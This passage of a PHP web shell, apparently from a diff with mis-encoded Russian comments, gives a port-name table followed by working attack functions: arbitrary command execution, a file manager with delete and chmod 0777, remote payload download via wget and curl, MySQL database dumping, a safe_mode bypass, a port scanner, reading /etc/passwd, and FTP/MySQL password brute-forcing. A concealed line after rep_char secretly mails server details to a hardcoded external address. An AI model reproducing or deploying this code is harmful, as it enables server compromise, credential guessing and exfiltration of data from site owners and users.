+$port[468] = "Photuris"; +$port[475] = "tcpnethaspsrv"; +$port[500] = "ISAKMP, pluto"; +$port[511] = "mynet-as"; +$port[512] = "biff, rexec"; +$port[513] = "who, rlogin"; +$port[514] = 
"syslog, rsh"; +$port[515] = "lp, lpr, line printer"; +$port[517] = "talk"; +$port[520] = "RIP (Routing Information Protocol)"; +$port[521] = "RIPng"; +$port[522] = "ULS"; +$port[531] = "IRC"; +$port[543] = "KLogin, AppleShare over IP"; +$port[545] = "QuickTime"; +$port[548] = "AFP"; +$port[554] = "Real Time Streaming Protocol"; +$port[555] = "phAse Zero"; +$port[563] = "NNTP over SSL"; +$port[575] = "VEMMI"; +$port[581] = "Bundle Discovery Protocol"; +$port[593] = "MS-RPC"; +$port[608] = "SIFT/UFT"; +$port[626] = "Apple ASIA"; +$port[631] = "IPP (Internet Printing Protocol)"; +$port[635] = "RLZ DBase"; +$port[636] = "sldap"; +$port[642] = "EMSD"; +$port[648] = "RRP (NSI Registry Registrar Protocol)"; +$port[655] = "tinc"; +$port[660] = "Apple MacOS Server Admin"; +$port[666] = "Doom"; +$port[674] = "ACAP"; +$port[687] = "AppleShare IP Registry"; +$port[700] = "buddyphone"; +$port[705] = "AgentX for SNMP"; +$port[901] = "swat, realsecure"; +$port[993] = "s-imap"; +$port[995] = "s-pop"; +$port[1024] = "Reserved"; +$port[1025] = "network blackjack"; +$port[1062] = "Veracity"; +$port[1080] = "SOCKS"; +$port[1085] = "WebObjects"; +$port[1227] = "DNS2Go"; +$port[1243] = "SubSeven"; +$port[1338] = "Millennium Worm"; +$port[1352] = "Lotus Notes"; +$port[1381] = "Apple Network License Manager"; +$port[1417] = "Timbuktu Service 1 Port"; +$port[1418] = "Timbuktu Service 2 Port"; +$port[1419] = "Timbuktu Service 3 Port"; +$port[1420] = "Timbuktu Service 4 Port"; +$port[1433] = "Microsoft SQL Server"; +$port[1434] = "Microsoft SQL Monitor"; +$port[1477] = "ms-sna-server"; +$port[1478] = "ms-sna-base"; +$port[1490] = "insitu-conf"; +$port[1494] = "Citrix ICA Protocol"; +$port[1498] = "Watcom-SQL"; +$port[1500] = "VLSI License Manager"; +$port[1503] = "T.120"; +$port[1521] = "Oracle SQL"; +$port[1522] = "Ricardo North America License Manager"; +$port[1524] = "ingres"; +$port[1525] = "prospero"; +$port[1526] = "prospero"; +$port[1527] = "tlisrv"; +$port[1529] = "oracle"; 
+$port[1547] = "laplink"; +$port[1604] = "Citrix ICA, MS Terminal Server"; +$port[1645] = "RADIUS Authentication"; +$port[1646] = "RADIUS Accounting"; +$port[1680] = "Carbon Copy"; +$port[1701] = "L2TP/LSF"; +$port[1717] = "Convoy"; +$port[1720] = "H.323/Q.931"; +$port[1723] = "PPTP control port"; +$port[1731] = "MSICCP"; +$port[1755] = "Windows Media .asf"; +$port[1758] = "TFTP multicast"; +$port[1761] = "cft-0"; +$port[1762] = "cft-1"; +$port[1763] = "cft-2"; +$port[1764] = "cft-3"; +$port[1765] = "cft-4"; +$port[1766] = "cft-5"; +$port[1767] = "cft-6"; +$port[1808] = "Oracle-VP2"; +$port[1812] = "RADIUS server"; +$port[1813] = "RADIUS accounting"; +$port[1818] = "ETFTP"; +$port[1973] = "DLSw DCAP/DRAP"; +$port[1985] = "HSRP"; +$port[1999] = "Cisco AUTH"; +$port[2001] = "glimpse"; +$port[2049] = "NFS"; +$port[2064] = "distributed.net"; +$port[2065] = "DLSw"; +$port[2066] = "DLSw"; +$port[2106] = "MZAP"; +$port[2140] = "DeepThroat"; +$port[2301] = "Compaq Insight Management Web Agents"; +$port[2327] = "Netscape Conference"; +$port[2336] = "Apple UG Control"; +$port[2427] = "MGCP gateway"; +$port[2504] = "WLBS"; +$port[2535] = "MADCAP"; +$port[2543] = "sip"; +$port[2592] = "netrek"; +$port[2727] = "MGCP call agent"; +$port[2628] = "DICT"; +$port[2998] = "ISS Real Secure Console Service Port"; +$port[3000] = "Firstclass"; +$port[3001] = "Redwood Broker"; +$port[3031] = "Apple AgentVU"; +$port[3128] = "squid"; +$port[3130] = "ICP"; +$port[3150] = "DeepThroat"; +$port[3264] = "ccmail"; +$port[3283] = "Apple NetAssitant"; +$port[3288] = "COPS"; +$port[3305] = "ODETTE"; +$port[3306] = "mySQL"; +$port[3389] = "RDP Protocol (Terminal Server)"; +$port[3521] = "netrek"; +$port[4000] = "icq, command-n-conquer and shell nfm"; +$port[4321] = "rwhois"; +$port[4333] = "mSQL"; +$port[4444] = "KRB524"; +$port[4827] = "HTCP"; +$port[5002] = "radio free ethernet"; +$port[5004] = "RTP"; +$port[5005] = "RTP"; +$port[5010] = "Yahoo! 
Messenger"; +$port[5050] = "multimedia conference control tool"; +$port[5060] = "SIP"; +$port[5150] = "Ascend Tunnel Management Protocol"; +$port[5190] = "AIM"; +$port[5500] = "securid"; +$port[5501] = "securidprop"; +$port[5423] = "Apple VirtualUser"; +$port[5555] = "Personal Agent"; +$port[5631] = "PCAnywhere data"; +$port[5632] = "PCAnywhere"; +$port[5678] = "Remote Replication Agent Connection"; +$port[5800] = "VNC"; +$port[5801] = "VNC"; +$port[5900] = "VNC"; +$port[5901] = "VNC"; +$port[6000] = "X Windows"; +$port[6112] = "BattleNet"; +$port[6502] = "Netscape Conference"; +$port[6667] = "IRC"; +$port[6670] = "VocalTec Internet Phone, DeepThroat"; +$port[6699] = "napster"; +$port[6776] = "Sub7"; +$port[6970] = "RTP"; +$port[7007] = "MSBD, Windows Media encoder"; +$port[7070] = "RealServer/QuickTime"; +$port[7777] = "cbt"; +$port[7778] = "Unreal"; +$port[7648] = "CU-SeeMe"; +$port[7649] = "CU-SeeMe"; +$port[8000] = "iRDMI/Shoutcast Server"; +$port[8010] = "WinGate 2.1"; +$port[8080] = "HTTP"; +$port[8181] = "HTTP"; +$port[8383] = "IMail WWW"; +$port[8875] = "napster"; +$port[8888] = "napster"; +$port[8889] = "Desktop Data TCP 1"; +$port[8890] = "Desktop Data TCP 2"; +$port[8891] = "Desktop Data TCP 3: NESS application"; +$port[8892] = "Desktop Data TCP 4: FARM product"; +$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application"; +$port[8894] = "Desktop Data TCP 6: COAL application"; +$port[9000] = "CSlistener"; +$port[10008] = "cheese worm"; +$port[11371] = "PGP 5 Keyserver"; +$port[13223] = "PowWow"; +$port[13224] = "PowWow"; +$port[14237] = "Palm"; +$port[14238] = "Palm"; +$port[18888] = "LiquidAudio"; +$port[21157] = "Activision"; +$port[22555] = "Vocaltec Web Conference"; +$port[23213] = "PowWow"; +$port[23214] = "PowWow"; +$port[23456] = "EvilFTP"; +$port[26000] = "Quake"; +$port[27001] = "QuakeWorld"; +$port[27010] = "Half-Life"; +$port[27015] = "Half-Life"; +$port[27960] = "QuakeIII"; +$port[30029] = "AOL Admin"; +$port[31337] = "Back Orifice"; 
+$port[32777] = "rpc.walld"; +$port[45000] = "Cisco NetRanger postofficed"; +$port[32773] = "rpc bserverd"; +$port[32776] = "rpc.spray"; +$port[32779] = "rpc.cmsd"; +$port[38036] = "timestep"; +$port[40193] = "Novell"; +$port[41524] = "arcserve discovery"; +//////////////////////////////////////////////////////////////////////////////// +////////////////////////////////شسحتضبب///////////////////////////////////////// +/////////////////////////////////////////////////////////////////////////////// +function rep_char($ch,$count) //دîâٍîًهيèه ٌèىâîëà +{ + $res=""; + for($i=0; $i<=$count; ++$i){ + $res.=$ch.""; + } + return $res; +}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); +function ex($comd) //آûïîëيهيèه êîىàينû +{ + $res = ''; + if (!empty($comd)){ + if(function_exists('exec')){ + exec($comd,$res); + $res=implode("\n",$res); + }elseif(function_exists('shell_exec')){ + $res=shell_exec($comd); + }elseif(function_exists('system')){ + ob_start(); + system($comd); + $res=ob_get_contents(); + ob_end_clean(); + }elseif(function_exists('passthru')){ + ob_start(); + passthru($comd); + $res=ob_get_contents(); + ob_end_clean(); + }elseif(is_resource($f=popen($comd,"r"))){ + $res = ""; + while(!feof($f)) { $res.=fread($f,1024); } + pclose($f); + } + } + return $res; +} +function sysinfo() //آûâîن SYSINFO +{ + global $curl_on, $dis_func, $mysql_stat, $safe_mode, $server, $HTTP_SERVER_VARS; + echo("<b><font face=Verdana size=2> System information:<br><font size=-2> + <hr>"); + echo (($safe_mode)?("Safe Mode: </b><font color=green>ON</font><b> "): + ("Safe Mode: </b><font 
color=red>OFF</font><b> ")); + $row_dis_func=explode(', ',$dis_func); + echo ("PHP: </b><font color=blue>".phpversion()."</font><b> "); + echo ("MySQL: </b>"); + if($mysql_stat){ + echo "<font color=green>ON </font><b>"; + } + else { + echo "<font color=red>OFF </font><b>"; + } + echo "cURL: </b>"; + if($curl_on){ + echo "<font color=green>ON</font><b><br>"; + }else + echo "<font color=red>OFF</font><b><br>"; + if ($dis_func!=""){ + echo "Disabled Functions: </b><font color=red>".$dis_func."</font><br><b>"; + } + $uname=ex('uname -a'); + echo "OS: </b><font color=blue>"; + if (empty($uname)){ + echo (php_uname()."</font><br><b>"); + }else + echo $uname."</font><br><b>"; + $id = ex('id'); + echo "SERVER: </b><font color=blue>".$server."</font><br><b>"; + echo "id: </b><font color=blue>"; + if (!empty($id)){ + echo $id."</font><br><b>"; + }else + echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid(). + "</font><br><b>"; + echo "<b>RemoteAddress:</b><font color=red>".$HTTP_SERVER_VARS['REMOTE_ADDR']."</font><br>"; + if(isset($HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'])){ + echo "<b>RemoteAddressIfProxy:</b><font color=red>".$HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR']."</font>"; + } + echo "<hr size=3 color=black>"; + echo "</font></font>"; +} +function read_dir($dir) //÷èٍàهى ïàïêَ +{ + $d=opendir($dir); + $i=0; + while($r=readdir($d)){ + $res[$i]=$r; + $i++; + } + return $res; +} +function permissions($mode,$file) { //îïًهنهëهيèه ٌâîéٌٍâ + $type=filetype($file); + $perms=$type[0]; + $perms.=($mode & 00400) ? "r" : "-"; + $perms.=($mode & 00200) ? "w" : "-"; + $perms.=($mode & 00100) ? "x" : "-"; + $perms.=($mode & 00040) ? "r" : "-"; + $perms.=($mode & 00020) ? "w" : "-"; + $perms.=($mode & 00010) ? "x" : "-"; + $perms.=($mode & 00004) ? "r" : "-"; + $perms.=($mode & 00002) ? "w" : "-"; + $perms.=($mode & 00001) ? 
"x" : "-"; + $perms.="(".$mode.")"; + return $perms; +} +function open_file($fil, $m, $d) //خٍêًûٍü ôàéë +{ + if (!($fp=fopen($fil,$m))) { + $res="Error opening file!\n"; + }else{ + ob_start(); + readfile($fil); + $res=ob_get_contents(); + ob_end_clean(); + if (!(fclose($fp))){ + $res="ERROR CLOSE"; + } + } + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">"; + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center><b>&nbsp;&nbsp;&nbsp;".$fil."&nbsp;&nbsp;&nbsp;</b></td></tr>"; + echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>"; + echo $res; + echo "</textarea></td></tr>"; + if(is_writable($fil)){ + echo "<input type=\"hidden\" value='".$fil."' name=\"fname\">"; + echo "<input type=\"hidden\" value='".$d."' name=\"dname\">"; + echo "<tr><td alling=center><input style='width:100px;' type=\"submit\" value=\"Save\" name=\"b_save\"></td></tr>"; + } + echo "</form></table>"; +} +function save_file($res,$fil, $d) //رîًُàيèٍü ôàéë +{ + unlink($fil); + $fp=fopen($fil,"wb"); + if(!$fp){ + $res="Error create file!\n".$fp; + }else{ + if (fwrite($fp,$res)){ + if (fclose($fp)){ + $res="File save succesfuly!\n"; + }else $res="Erorr close!\n"; + }else $res="Error wright!\n"; + } + umask(0000); + chmod($fil,0777); + return $res; +} +function strmass($mass){ + $res=""; + foreach($mass as $k=>$v){ + $res.=$v."|"; + } + return $res; +} +function sortbyname($fnames, $d) +{ + $filenames=""; + $foldernames=""; + $numnames=count($fnames); + for($i=0;$i<=$numnames;$i++){ + if(is_dir($d."/".$fnames[$i])){ + $foldernames.=$fnames[$i]."|"; + }else + $filenames.=$fnames[$i]."|"; + } + $mass1=explode("|",$foldernames); + $mass2=explode("|",$filenames); + sort($mass1); + sort($mass2); + $mass1=strmass($mass1); + $mass2=strmass($mass2); + $mass=explode("|",$mass1.$mass2); + return $mass; +} +function list_dir($d) //حàâèمàِèے +{ + global $HTTP_REFERER; + 
if(isset($_POST['b_up']) OR isset($_POST['b_open_dir'])){ + chdir($_POST['fname']); + $d=getcwd(); + }else + $d=getcwd(); + if($_POST['b_new_dir']){ + mkdir($_POST['new']); + chmod($_POST['new'],0777); + $d=$_POST['new']; + } + if($_POST['b_del'] AND is_dir($_POST['fname'])){ + rmdir($_POST['fname']); + chdir($_POST['dname']); + $d=getcwd(); + } + if($_POST['b_del'] AND !is_dir($_POST['fname'])){ + unlink($_POST['fname']); + chdir($_POST['dname']); + $d=getcwd(); + } + if($_POST['b_change_dir']){ + chdir($_POST['change_dir']); + $d=getcwd(); + } + if($_POST['b_new_file'] OR $_POST['b_open_file']){ + chdir($_POST['dname']); + $d=getcwd(); + } + $dir=read_dir($d); + $dir=sortbyname($dir,$d); + $count=count($dir); + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">"; + echo "<table BORDER=1 align=center>"; + echo "<tr bgcolor=#ffff00><td alling=\"center\"><b>Navigation</b></td></tr>"; + if(is_writable($d)){ + echo "<tr><td alling=\"center\"><input style='width:200px;' type=\"text\" value=\"$d\" name=\"new\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"NewDir\" name=\"b_new_dir\"></td>"; + echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"NewFile\" name=\"b_new_file\"></td></tr>"; + } + echo "<tr><td alling=\"center\"><input style='width:200px;' type=\"text\" value=\"$d\" name=\"change_dir\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"ChangeDir\" name=\"b_change_dir\"></td></tr>"; + if(!$safe_mode){ + echo "<tr><td alling=\"center\"><input style='width:200px;' type=\"text\" value=\"\" name=\"ffile\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"FindeFile\" name=\"b_f_file\"></td></tr>"; + } + echo "</table></form>"; + echo "<table CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF BORDER=1 align=center bordercolor=#808080 
bordercolorlight=black bordercolordark=white>"; + echo "<tr bgcolor=#ffff00><td><b>&nbsp;&nbsp;&nbsp;Directory&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Permission&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Size&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Owner/Group&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Action&nbsp;&nbsp;&nbsp;</b></td>"; + for($i=0; $i<$count; $i++){ + if($dir[$i]!=""){ + $full=$d."/".$dir[$i]; + $perm=permissions(fileperms($full),$dir[$i]); + $file=$d."/".$dir[$i]; + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + if(is_dir($file)){ + echo "<tr bgcolor=#98FA00><td>".$dir[$i]."&nbsp;&nbsp;&nbsp;</td><input type=\"hidden\" value='".$d."' name=\"dname\"><input type=\"hidden\" value='".$file."' name=\"fname\"><td alling=\"center\">".$perm. + "&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">".filesize($dir[$i])."&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">&nbsp;&nbsp;&nbsp;".fileowner($dir[$i])."&nbsp;&nbsp;&nbsp;".filegroup($dir[$i])."&nbsp;&nbsp;&nbsp;</td>"; + }elseif(is_file($file)){ + echo "<tr><td>".$dir[$i]."&nbsp;&nbsp;&nbsp;</td><input type=\"hidden\" value='".$d."' name=\"dname\"><input type=\"hidden\" value='".$file."' name=\"fname\"><td alling=\"center\">".$perm. + "&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">".filesize($dir[$i])."&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">&nbsp;&nbsp;&nbsp;".fileowner($dir[$i])."&nbsp;&nbsp;&nbsp;".filegroup($dir[$i])."&nbsp;&nbsp;&nbsp;</td>"; + }else + echo "<tr bgcolor=#ffff00><td>".$dir[$i]."&nbsp;&nbsp;&nbsp;</td><input type=\"hidden\" value='".$d."' name=\"dname\"><input type=\"hidden\" value='".$file."' name=\"fname\"><td alling=\"center\">".$perm. 
+ "&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">".filesize($dir[$i])."&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">&nbsp;&nbsp;&nbsp;".fileowner($dir[$i])."&nbsp;&nbsp;&nbsp;".filegroup($dir[$i])."&nbsp;&nbsp;&nbsp;</td>"; + if(is_dir($file)){ + echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Listing\" name=\"b_open_dir\"></td>"; + }elseif(is_readable($file)){ + echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Open\" name=\"b_open_file\"></td>"; + } + if(is_writable($file) AND $file!=".."){ + echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Delete\" name=\"b_del\"></td>"; + } + if(is_readable($file) AND !is_dir($file)){ + echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Download\" name=\"b_down\"></td>"; + } + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\"></tr>"; + echo "</form>"; + } + } + echo "</table>"; + closedir($d); +} +function up_file($fil,$tfil, $box) //اàمًَçêà ôàéëîâ يà ٌهًâهً +{ + global $_FILES; + if ($tfil==""){ + $res="Target is failde!"; + } + if ($box=="PC"){ + if(copy($_FILES["filename"]["tmp_name"],$tfil)){ + chmod($tfil,0777); + if(file_exists($tfil)){ + $res="Ok"; + }else + $res="False"; + }else { + $res="Error loading file!"; + } + } + if($box=="WGET") { + $load="wget ".$fil." -O ".$tfil.""; + $res=ex($load); + if(file_exists($tfil)){ + $res="Ok"; + }else + $res="False"; + chmod($tfil,0777); + } + if($box=="FETCH"){ + $load="fetch -o ".$tfil." -p ".$fil.""; + $res=ex($load); + if(file_exists($tfil)){ + $res="Ok"; + }else + $res="False"; + chmod($tfil,0777); + } + if($box=="LYNX"){ + $load="lynx -source ".$fil." > ".$tfil.""; + $res=ex($load); + if(file_exists($tfil)){ + $res="Ok"; + }else + $res="False"; + chmod($tfil,0777); + } + if($box=="cURL"){ + $load="curl"." ".$fil." 
-o ".$tfil.""; + $res=ex($load); + if(file_exists($tfil)){ + $res="Ok"; + }else + $res="False"; + chmod($tfil,0777); + } + if($box=="fopen"){ + $data=implode("", file($fil)); + $fp=fopen($tfil, "wb"); + fputs($fp,$data); + fclose($fp); + chmod($tfil,0777); + if(file_exists($tfil)){ + $res="Ok"; + }else + $res="False"; + } + return $res; +} +function run_sql($comd, $db,$host, $username, $pass) //ذهçَëüٍàٍ SQL çàïًîٌà +{ + if ($comd!=""){ + if ($db!=""){ + $connect=mysql_connect($host, $username, $pass); + if (!$connect) { + $res='Could not connect to MySQL'; + } + mysql_select_db ($db); + $row=mysql_query($comd); + while ($r= mysql_fetch_row($row)) { + $res.="&nbsp;".implode($r); + } + $result=$res; + mysql_free_result($row); + mysql_free_result($r); + mysql_close($connect); + }else $result="Select data base!"; + }else $result="No command!"; + return $result; +} +function db_show($host, $username, $pass) //آûâîن èىه‏ùèٌُے ءؤ +{ + $res="Exists BD: \n"; + $connect=mysql_connect($host, $username, $pass); + if (!$connect){ + $res="Could not connect to MySQL!\n".mysql_error(); + }else{ + $db_list=mysql_list_dbs($connect); + while ($row = mysql_fetch_object($db_list)) { + $res.=$row->Database . "\n"; + } + mysql_close($connect); + } + return $res; +} +function show_tables($bd, $host, $username, $pass) //آûâîن èىه‏ùèٌُے ٍàلëèِ +{ + if ($bd!=""){ + $res="Exists tables: \n"; + $connect=mysql_connect($host, $username, $pass); + if (!$connect){ + $res="Could not connect to MySQL\n".mysql_error(); + }else{ + $r=mysql_query("SHOW TABLES FROM $bd"); + $res="Exist tables:\n"; + while ($row=mysql_fetch_row($r)) { + $res.="Table: $row[0]\n"; + $fields=mysql_list_fields($bd, $row[0], $connect); + $columns=mysql_num_fields($fields); + $res.="| "; + for ($i=0; $i<$columns; $i++) { + $res.=mysql_field_name($fields, $i)." | "; + } + $res.="\n____________________________\n"; + } + mysql_free_result($r); + mysql_close($connect); + } + }else + $res="Select data base! 
"; + return $res; +} +function dump_table($tab, $db,$host, $username, $pass) //ؤàىï ٍàلëèِû +{ + $connect=mysql_connect($host, $username, $pass); + if (!$connect) { + $result="Could not connect to MySQL!\n".mysql_error(); + }else{ + if (!mysql_select_db($db,$connect)){ + $result="Could not connect to db!\n".mysql_error(); + }else{ + if ($db==""){ + $result="Select data base!"; + }else{ + $res1="# MySQL dump of $tab\r\n"; + $r=mysql_query("SHOW CREATE TABLE `".$tab."`", $connect); + $row=mysql_fetch_row($r); + $res1.=$row[1]."\r\n\r\n"; + $res1.= "# ---------------------------------\r\n\r\n"; + $res2 = ''; + $r=mysql_query("SELECT * FROM `".$tab."`", $connect); + if (mysql_num_rows($r)>0){ + while (($row=mysql_fetch_assoc($r))){ + $keys=implode("`, `", array_keys($row)); + $values=array_values($row); + foreach($values as $k=>$v){ + $values[$k]=addslashes($v); + } + $values=implode("', '", $values); + $res2.="INSERT INTO `".$tab."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $res2.="\r\n# ---------------------------------"; + } + $result=$res1.$res2; + mysql_close($db); + } + } + } + + return $result; +} +function down_tb($tab, $db,$host, $username, $pass){ + $connect=mysql_connect($host, $username, $pass); + if (!$connect) { + die("Could not connect to MySQL!\n".mysql_error()); + }else{ + if (!mysql_select_db($db,$connect)){ + die("Could not connect to db!\n".mysql_error()); + }else{ + if ($db==""){ + die("Select data base!"); + }else{ + $res1=""; + $r=mysql_query("SELECT * FROM `".$tab."`", $connect); + if (mysql_num_rows($r)>0){ + while (($row=mysql_fetch_assoc($r))){ + foreach($row as $k=>$v){ + $res1.=$v."\t"; + } + $res1.="\n"; + } + } + mysql_close($db); + } + } + } + + return $res1; +} +function safe_mode_fuck($fil,$host, $username, $pass, $dbname)//خلُîن لهçîïàٌيîمî ًهوèىà +{ + $connect=mysql_connect($host,$username,$pass); + if($connect){ + if(mysql_select_db($dbname,$connect)){ + $c="DROP TABLE IF EXISTS temp_gfs_table;"; + 
mysql_query($c); + $c="CREATE TABLE `temp_gfs_table` ( `file` LONGBLOB NOT NULL );"; + mysql_query($c); + $c="LOAD DATA INFILE \"".$fil."\" INTO TABLE temp_gfs_table;"; + mysql_query($c); + $c="SELECT * FROM temp_gfs_table;"; + $r=mysql_query($c); + while(($row=mysql_fetch_array($r))){ + $res.=htmlspecialchars($row[0]); + } + $c="DROP TABLE IF EXISTS temp_gfs_table;"; + mysql_query($c); + }else + $res= "Can't select database"; + mysql_close($db); + }else + $res="Can't connect to mysql server"; + return $res; +} +function portscan($host) +{ + global $port; + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>Host: </td><td alling=center><b><font color=green> ".$host." </b></font></td></tr>"; + for($i=1; $i<=65535; $i++){ + $fp=fsockopen($host, $i, $errno, $errstr, 4); + if($fp){ + fclose($fp); + if(isset($port[$i])){ + $k=$port[$i]; + }else + $k=getservbyport($i, "TCP"); + if($k==""){$k="N\A";} + echo "<tr><td alling=center>Port: ".$i." </td><td alling=center><b><font color=green>".$k."</b></font></td>"; + echo "</tr>"; + } + } + echo "</table>"; +} +function pwd_conwert() +{ + $res=""; + if(file_exists("/etc/passwd")){ + $input=implode(file("/etc/passwd")); + $input=explode("\n", $input); + foreach($input as $i=>$v){ + $word=explode(":",$v); + $res.=$word[0]." "; + } + $res=explode(" ",$res); + }else{ + $input=implode(ex("cat /etc/passwd")); + $input=explode("\n", $input); + foreach($input as $i=>$v){ + $word=explode(":",$v); + $res.=$word[0]." 
"; + } + $res=explode(" ",$res); + } + return $res; +} +function brute($type,$type2,$host,$file) +{ + if($type2=="login:login"){ + if($type=="ftp"){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>BruteFTP: </td><td alling=center><b><font color=green> localhost </b></font></td></tr>"; + $mass=pwd_conwert(); + foreach($mass as $i=>$v){ + if($v!=""){ + $conn_id=ftp_connect($host); + if(!$conn_id){ die("Coud not connect");} + if (ftp_login($conn_id, $v, $v)){ + echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=green> OK </b></font></td></tr>"; + }else + echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=red> NO </b></font></td></tr>"; + ftp_close($conn_id); + } + } + echo "</table>"; + }elseif($type=="mysql"){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>BruteMySQL: </td><td alling=center><b><font color=green> localhost </b></font></td></tr>"; + $mass=pwd_conwert(); + foreach($mass as $i=>$v){ + if($v!=""){ + $conn_id=mysql_connect($host,$v,$v); + if($conn_id){ + echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=green> OK </b></font></td></tr>"; + }else + echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=red> NO </b></font></td></tr>"; + mysql_close($conn_id); + } + } + echo "</table>"; + } + }elseif($type2=="login:empty"){ + if($type=="ftp"){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>BruteFTP: </td><td alling=center><b><font color=green> localhost </b></font></td></tr>"; + $mass=pwd_conwert(); + foreach($mass as $i=>$v){ + if($v!=""){ + $conn_id=ftp_connect($host); + if(!$conn_id){ die("Coud not connect");} + if (ftp_login($conn_id, $v, "")){ + echo "<tr><td alling=center> ".$v." 
: empty </td><td alling=center><b><font color=green> OK </b></font></td></tr>"; + } + ftp_close($conn_id); + } + } + echo "</table>"; + }elseif($type=="mysql"){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>BruteMySQL: </td><td alling=center><b><font color=green> localhost </b></font></td></tr>"; + $mass=pwd_conwert(); + foreach($mass as $i=>$v){ + if($v!=""){ + $conn_id=mysql_connect($host,$v,""); + if($conn_id){ + echo "<tr><td alling=center> ".$v." : empty </td><td alling=center><b><font color=green> OK </b></font></td></tr>"; + } + mysql_close($conn_id); + } + } + echo "</table>"; + } + }elseif($type2=="login:number"){ + if($type=="ftp"){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>BruteFTP: </td><td alling=center><b><font color=green> localhost </b></font></td></tr>"; + $mass=pwd_conwert(); + foreach($mass as $i=>$v){ + if($v!=""){ + $conn_id=ftp_connect($host); + if(!$conn_id){ die("Coud not connect");} + for($j=0; $j<=999; $j++){ + if (ftp_login($conn_id, $v, "$j")){ + echo "<tr><td alling=center> ".$v." : $j </td><td alling=center><b><font color=green> OK </b></font></td></tr>"; + } + ftp_close($conn_id); + } + } + } + echo "</table>"; + }elseif($type=="mysql"){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>BruteMySQL: </td><td alling=center><b><font color=green> localhost </b></font></td></tr>"; + $mass=pwd_conwert(); + foreach($mass as $i=>$v){ + if($v!=""){ + for($j=0; $j<=999; $j++){ + $conn_id=mysql_connect($host,$v,"$j"); + if($conn_id){ + echo "<tr><td alling=center> ".$v." 
: $j </td><td alling=center><b><font color=green> OK </b></font></td></tr>"; + } + mysql_close($conn_id); + } + } + } + echo "</table>"; + } + }elseif($type2=="login:nigol"){ + if($type=="ftp"){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>BruteFTP: </td><td alling=center><b><font color=green> localhost </b></font></td></tr>"; + $mass=pwd_conwert(); + foreach($mass as $i=>$v){ + if($v!=""){ + $conn_id=ftp_connect($host); + if(!$conn_id){ die("Coud not connect");} + if (ftp_login($conn_id, $v, strrev($v))){ + echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=green> OK </b></font></td></tr>"; + }else + echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=red> NO </b></font></td></tr>"; + ftp_close($conn_id); + } + } + echo "</table>"; + }elseif($type=="mysql"){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>BruteMySQL: </td><td alling=center><b><font color=green> localhost </b></font></td></tr>"; + $mass=pwd_conwert(); + foreach($mass as $i=>$v){ + if($v!=""){ + $conn_id=mysql_connect($host,$v,strrev($v)); + if($conn_id){ + echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=green> OK </b></font></td></tr>"; + }else + echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=red> NO </b></font></td></tr>"; + mysql_close($conn_id); + } + } + echo "</table>"; + } + 